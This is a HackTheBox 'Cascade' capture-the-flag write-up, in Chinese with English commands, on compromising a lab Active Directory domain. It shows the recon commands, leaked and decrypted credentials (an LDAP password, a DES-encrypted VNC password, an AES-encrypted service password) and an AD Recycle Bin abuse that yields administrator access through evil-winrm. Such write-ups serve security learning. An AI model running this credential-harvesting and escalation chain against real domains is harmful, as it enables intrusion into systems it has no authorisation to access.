Cascade on HackTheBox

Before all

Victim’s IP : 10.10.10.103
Victim’s Host : *.cascade.local
Attacker’s IP : 10.10.14.14

RECON

port scan

Command

rustscan -a 10.10.10.182 --ulimit 5000 -- -sC -sV -Pn --script vuln

Result

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-01-01 02:10:52Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49154/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49165/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 51409/tcp): CLEAN (Timeout)
|   Check 2 (port 15990/tcp): CLEAN (Timeout)
|   Check 3 (port 10882/udp): CLEAN (Timeout)
|   Check 4 (port 42035/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 0s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-01-01T02:11:47
|_  start_date: 2025-01-01T02:03:54

一樣，開了 ldap, smb, kerberos, winrpc 這些常見 AD Port
拿到域名 cascade.local

smb enumeration

Command

enum4linux -a 10.10.10.182

Result
很多，包含獲得了 userlist

user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]

ldap search

利用 ldap bind 的手法：
Command

ldapsearch -x -LLL -H ldap://10.10.10.182 -D 'dc=cascade,dc=local' -b "dc=cascade,dc=local" > ldaplog

Result
注意到 r.thompson 的密碼外洩：

base64 decode 後：rY4n5eva
用這資料是可以登入成功的！

Exploit

起手式一樣是 bloodhound，但目前沒什麼用…
Command

bloodhound-python -c All -u 'r.thompson' -p 'rY4n5eva' -d CASCADE.LOCAL -ns 10.10.10.182 --zip

smb enumeration

先打開 crackmapexec 抓一下：

crackmapexec smb 10.10.10.182 -u 'r.thompson' -p 'rY4n5eva'  -M spider_plus -o READ_ONLY=true

找到./Data/IT/Temp/s.smith/VNC Install.reg疑似有密碼資訊：

... a lot of stuffs
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
... a lot of stuffs

參考這篇文章獲取明文：
https://github.com/frizb/PasswordDecrypts
Command

echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

Result

00000000  73 54 33 33 33 76 65 32                           |sT333ve2|
00000008

獲得 s.smith 權限，evil-winrm 也可登入
Command

evil-winrm -u s.smith -p sT333ve2 -i 10.10.10.182

reversing

再次以新權限抓取檔案：

crackmapexec smb 10.10.10.182 -u 's.smith' -p 'sT333ve2'  -M spider_plus -o READ_ONLY=true

注意到 Audt$ 目錄：

.
├── Audit$
│   ├── CascAudit.exe
│   ├── CascCrypto.dll
│   ├── DB
│   │   └── Audit.db
│   └── RunAudit.bat

把 Audit.db 打開拿到一個 base64 後的密碼，但被加密過：

把 CascAudit.exe 用 dnSpy 拆開可以看到 key

把 CascCrypto.dll 拆開拿到 IV 和加密方法是 CBC

from Crypto.Cipher import AES
import base64
key = b'c4scadek3y654321'
iv = b'1tdyjCbY1Ix49842'
ciphertext_base64 = "BQO5l5Kj9MdErXx6Q6AGOw=="
ciphertext = base64.b64decode(ciphertext_base64)
cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext_padded = cipher.decrypt(ciphertext)
padding_length = plaintext_padded[-1]
plaintext = plaintext_padded[:-padding_length]
print(plaintext)

Decrypt一下取得密碼：w3lc0meFr31nd，可以登入 ArkSvc

Abusing AD Recycle Bin

注意到 ArkSvc 在 AD Recycle Bin 組內，參考：https://github.com/ivanversluis/pentest-hacktricks/blob/master/windows/active-directory-methodology/privileged-accounts-and-token-privileges.md#ad-recycle-bin

先以 evil-winrm 進行連線：

evil-winrm -i 10.10.10.182 -u arksvc -p 'w3lc0meFr31nd'

在 shell 裡面執行：

Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

注意到這一段：

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin

又有一個 LedacyPwd， decode 後即取得 Administrator 密碼

Finally

evil-winrm -i 10.10.10.182 -u administrator -p 'baCT3r1aN00dles'

PWNED!!

After all

快打完 AD-101 Path 了 zzz
明天還有段考，先念下書